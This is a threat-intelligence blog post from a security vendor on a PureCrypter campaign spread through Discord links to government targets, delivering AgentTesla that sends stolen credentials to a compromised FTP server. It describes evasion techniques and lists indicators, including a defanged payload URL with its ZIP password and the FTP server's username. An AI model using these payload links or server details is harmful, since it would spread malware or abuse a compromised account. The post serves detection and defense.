Webinar:
First Line of Defense: Menlo Secure Enterprise Browser
Icon Rounded Closed - BRIX Templates

PureCrypter targets government entities through Discord

Abhay Yadav
|
February 21, 2023
linkedin logotwitter/x logofacebook logoSocial share icon via eMail

Executive Summary

Menlo Labs has uncovered an unknown threat actor that’s leveraging an evasive threat campaign distributed via Discord that features the PureCrypter downloader and targets government entities. The PureCrypter campaign uses the domain of a compromised non-profit organization as a Command and Control (C2) to deliver a secondary payload. The campaign was found to have delivered several types of malware including Redline Stealer, AgentTesla, Eternity, Blackmoon and Philadelphia Ransomware. Our investigation started when Menlo’s Cloud Security Platform blocked password-protected archive files across multiple government customers in the Asia-Pacific (APAC) and North America regions.

Menlo Labs assesses that this threat actor group will continue to use the compromised and taken infrastructure as long as they can, before needing to find a new home. Leaving credentials in malware is an OpSec failure but it leaves a trace for analysts to follow. Fortunately in this case, Menlo’s Cloud Security Platform blocked this attack, which allowed Menlo Labs to see it and start to track this actor.

Infection Chain

diagram illustrating download to password protected zip to purecrypter

Threat Intelligence

Threat analysis showed that PureCrypter is downloading a secondary malware, believed to be AgentTesla.

PureCrypter is an advanced downloader which downloads Remote Access Trojans (RATs) and Infostealers. It has been sold since March 2021 on“hxxps[://]purecoder.sellix.io/.” AgentTesla is an advanced backdoor with capabilities including stealing stored passwords from different browsers, clipboard logging, screen keylogging and screen capturing. It is written in .net and supports all versions of Windows operating system.

In our investigation, we found that AgentTesla establishes a connection to an FTP server where it stores the stolen victim’s credentials. The FTP server appears to have been taken over and the leaked credentials for the domain were found online, thus suggesting that the threat actors used these credentials to gain access to the server.

Screenshot showing collected victim information on FTP server
Compromised FTP server showing collected victim information
screenshot showing collected victim information

It's also noteworthy that the download link for the secondary malware is from a compromised domain of a non-profit organization whose leaked credentials were also found online.

A similar sample to theAgentTesla malware we analyzed was discovered in a phishing email with the subject "FW: New Order no. 5959" from Alejandro Gonzalo (e052450f2@891f4e7e1668[.]com). The malicious attachment was named "Nuevo pedido 7887979-800898.gz" and contained FTP server credentials that were the same as those found in the first case.

Under that same email address, another malicious email titled "New Order" was also uncovered with an attached file called "Ppurchase order6007979-709797790.gz". This one also used the same FTP server – ftp[://]ftp.mgcpakistan[.]com – as part of its infection process!

The FTP server (ftp[://]ftp.mgcpakistan[.]com) was also seen in a campaign using OneNote to deliver malware. Attackers have been sending phishing emails with links to malicious OneNote files that can download additional malware or steal information from the victim's device. Altogether, the Labs team found 106 files using said FTP server.

Infection Vector/Technical Details

In this campaign, Discord was used to host the payload, and a link to the payload is sent via email. To evade existing defenses, PureCrypter uses password protected ZIP files. Below is a screenshot that shows the poor detection of these password-protected payloads on VT.

Screenshot showing 1 security vendor and no sandboxes flagged file as malicious

The following steps were taken by the attacker to deliver the payload:

  • An email with Discord app url pointing to malicious password protected zip file is sent to the victim (https://cdn[.]discordapp.com/attachments/1006638283645784218/1048923462128914512/Private_file__dont_share.zip, pwd - 1234, md5- 967f9bc90202925e1f941c8ea1db2c94)
  • The ZIP extracts a loader written in .net called PureCrypter (md5 - 5420DCBAE4F1FBA8AFE85CB03DCD9BFC). The loader tries to download a secondary payload from the compromised non-profit organization shown in the below screenshot. At the time of investigation the compromised non-profit organization’s website was down and we didn’t get its secondary payload.
screenshot of code

While we were not able to download the second stage payload from the PureCrypter sample mentioned above (md5 - 5420DCBAE4F1FBA8AFE85CB03DCD9BFC), we were able to identify similar samples which were seen downloading malicious payloads from the compromised non-profit organization. Upon further investigation, we determined that this was AgentTesla and was communicating to an FTP server located in Pakistan (as mentioned in the intel section above). The technical analysis below is for the new sample md5 -C3B90A10922EEF6D635C6C786F29A5D0).

screenshot of code

This downloaded binary is packed to evade initial detection. It contains the AgentTesla payload which is encrypted in the resource section using DES Algorithm as shown in the below screenshot.

screenshot of code

The des.IV and des.Key of the encrypted payload is shown in the below screenshot.

screenshot of des.IV and des.Key of encrypted payload

AgentTesla uses a process hollowing technique to inject its payload (Md5 - BCF031AB2B43DC382B365BA3DF9F09BC) into cvtres.exe. This is a standard windows process that exists across all versions of Windows OS.

AgentTesla uses an XOR algorithm to encrypt its config file. The screenshot below shows the xor encoded config file.

screenshot of xor encoded config file

Menlo Labs was able to decrypt the config file. The decrypted file is shown below.

screenshot of decrypted config file

The decrypted file contains the CnC details of the FTP server to which AgentTesla uploads the victim data.

Network Communication

AgentTesla uses FTP for data exfiltration. For FtpWebRequest it requires an FTP server path and credentials to send stolen data to the server shown in the screenshot below:

screenshot showing required ftp server path and credentials to send stolen data to server

This screenshot shows how to get FtpWebRequest:

screenshot of code showing how to get FTPWebRequest
screenshot of code showing how to get FTPWebRequest

“ddd@mgcpakistan[.]com”
Password

screenshot of code for password

“*password*” - due to security reasons we are not putting the correct password here.

Conclusion

The Labs team will continue to monitor for an evolution in this threat actor activity. This threat actor doesn’t appear to be a major player in the threat landscape, but the targeting of government entities is surely a reason to watch out for them.

IOCS

FTP

“ftp://ftp[.]mgcpakistan[.]com/”
Username: “ddd@mgcpakistan[.]com”

HTTP

cents-ability.org

email

be18d4fc15b51daedc3165112dad779e17389793fe0515d62bbcf00def2c3c2d
5732b89d931b84467ac9f149b2d60f3aee679a5f6472d6b4701202ab2cd80e99

Malware

a7c006a79a6ded6b1cb39a71183123dcaaaa21ea2684a8f199f27e16fcb30e8e
5d649c5aa230376f1a08074aee91129b8031606856e9b4b6c6d0387f35f6629d
f950d207d33507345beeb3605c4e0adfa6b274e67f59db10bd08b91c96e8f5ad
397b94a80b17e7fbf78585532874aba349f194f84f723bd4adc79542d90efed3
7a5b8b448e7d4fa5edc94dcb66b1493adad87b62291be4ddcbd61fb4f25346a8
efc0b3bfcec19ef704697bf0c4fd4f1cfb091dbfee9c7bf456fac02bcffcfedf
C846e7bbbc1f65452bdca87523edf0fd1a58cbd9a45e622e29d480d8d80ac331

Imphash shared by 106 FTP files:

F34d5f2d4577ed6d9ceec516c1f5a744 (86 files)
61259b55b8912888e90f516ca08dc514 (10 files)

Reg key 82 of the 106 FTP files opened:

HKLM\Software\Microsoft\Fusion\LoggingLevel

Of the 106 samples, over half shared the following MITRE Techniques:

  • Execution TA0002
  • Windows Management Instrumentation T1047
  • Privilege Escalation TA0004
  • Process Injection T1055
  • Defense Evasion TA0005
  • Disable or Modify Tools T1562.001
  • Virtualization/Sandbox Evasion T1497
  • Process Injection T1055
  • Obfuscated Files or Information T1027
  • Software Packing T1027.002
  • Masquerading T1036
  • Credential Access TA0006
  • OS Credential Dumping T1003
  • Discovery TA0007
  • System Information Discovery T1082
  • Security Software Discovery T1518.001
  • Virtualization/Sandbox Evasion T1497
  • Application Window Discovery T1010
  • Process Discovery T1057
  • Collection TA0009
  • Data from Local System T1005
  • Command and Control TA0011
  • Non-Application Layer Protocol T1095
  • Application Layer Protocol T1071

Other similar files

Md5
14e4bfe2b41a8cf4b3ab724400629214
f1c29ba01377c35e6f920f0aa626eaf5
5420dcbae4f1fba8afe85cb03dcd9bfc
18e9cd6b282d626e47c2074783a2fa78
2499343e00b0855882284e37bf0fa327
0d8b1ad53fddacf2221409c1c1f3fd70
2499343e00b0855882284e37bf0fa327
0d8b1ad53fddacf2221409c1c1f3fd70
17f512e1a9f5e35ce5761dba6ccb09cb
b5c60625612fe650be3dcbe558db1bbc
a478540cda34b75688c4c6da4babf973
765f09987f0ea9a3797c82a1c3fced46
bbd003bc5c9d50211645b028833bbeb2
71b4db69df677a2acd60896e11237146
f4eebe921b734d563e539752be05931d
b4fd2d06ac3ea18077848c9e96a25142
1d3c8ca9c0d2d70c656f41f0ac0fe818
785bfaa6322450f1c7fe7f0bf260772d
2fa290d07b56bde282073b955eae573e
d70bb6e2f03e5f456103b9d6e2dc2ee7
0ede257a56a6b1fbd2b1405568b44015
fdd4cd11d278dab26c2c8551e006c4ed
dbcaa05d5ca47ff8c893f47ad9131b29
c9ca95c2a07339edb13784c72f876a60
c3b90a10922eef6d635c6c786f29a5d0
8ef7d7ec24fb7f6b994006e9f339d9af
f1c29ba01377c35e6f920f0aa626eaf5
fa4ffa1f263f5fc67309569975611640
754920678bc60dabeb7c96bfb88273de
2964ce62d3c776ba7cb68a48d6afb06e
8503b56d9585b8c9e6333bb22c610b54
eaaf20fdc4a07418b0c8e85a2e3c9b27
b6c849fcdcda6c6d8367f159047d26c4
de94d596cac180d348a4acdeeaaa9439
3f92847d032f4986026992893acf271e
ae158d61bed131bcfd7d6cecdccde79b